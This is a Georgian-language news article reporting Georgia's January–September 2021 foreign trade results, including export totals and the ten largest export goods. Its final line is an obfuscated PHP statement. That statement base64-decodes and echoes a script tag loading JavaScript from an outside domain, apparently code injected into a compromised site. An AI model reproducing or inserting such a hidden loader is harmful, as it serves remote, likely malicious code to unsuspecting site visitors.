celsiusi
ავერსი საქკაბელი
2021 წლის იანვარ-სექტემბერის საგარეო სავაჭრო ბრუნვის წინასწარი შედეგებით ირკვევა, რომ ქვეყნის საგარეო ვაჭრობის მაჩვენებელი 22.3%-ით 10 მლრდ დოლარამდე გაიზარდა და აქედან საქართველომ საქონლის ექსპორტით 2.981 მლრდ დოლარის შემოსავალი მიიღო, რაც გასული წლის ანალოგიურ პერიოდის მონაცემებს 24%-ით აღემატება. 
 
საანგარიშო პერიოდში, ქვეყნის სასაქონლო ჯგუფებიდან საექსპორტო ათეულში პირველი ადგილი 19.2%-იანი წილი სპილენძის მადნებმა და კონცენტრატებმა დაიკავა, თუმცა ეს უმსხვილესი სასაქონლო ჯგუფებიდან ერთადერთი პროდუქტია, რომლის ექსპორტი გასული წლის 9 თვესთან შედარებით შემცირდა.
 
რაც შეეხება თOP-10 საექსპორტო საქონელს, იანვარ-სექტემბერში მათი ჩამონათვალი შემდეგია:
 
1. სპილენძის მადნები და კონცენტრატები - 571.7 მლნ დოლარი, კლება -3.2%;
2. მსუბუქი ავტომობილები 338.2 მლნ დოლარი, ზრდა - 11.2%;
3. ფეროშენადნობები - 316.5 მლნ დოლარით, ზრდა - 75.5%;
4. ყურძნის ნატურალური ღვინოები - 166.7 მლნ დოლარი, ზრდა - 16.4%;
5. სპირტიანი სასმელები - 105.7 მლნ დოლარი, ზრდა - 22.6%;
6. მინერალური და მტკნარი წყლები - 104.1 მლნ დოლარი, ზრდა - 28.1%;
7. სამკურნალო საშუალებები დაფასოებული - 72.5 მლნ დოლარი, ზრდა - 1.5%;
8. თხილი და სხვა კაკალი - 70 მლნ დოლარი, ზრდა - 41.9%;
9. აზოტოვანი სასუქები - 65.5 მლნ დოლარი, ზრდა - 16.3%;
10. ტრიკოტაჟის ნაწარმი - 49.1 მლნ დოლარი, ზრდა - 70%.
 
სხვა დანარჩენი საქონლის ექსპორტმა სულ 1.120 მლრდ დოლარი შეადგინა, რაც მთლიანი ექსპორტის 37.6%-ია.
1145
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");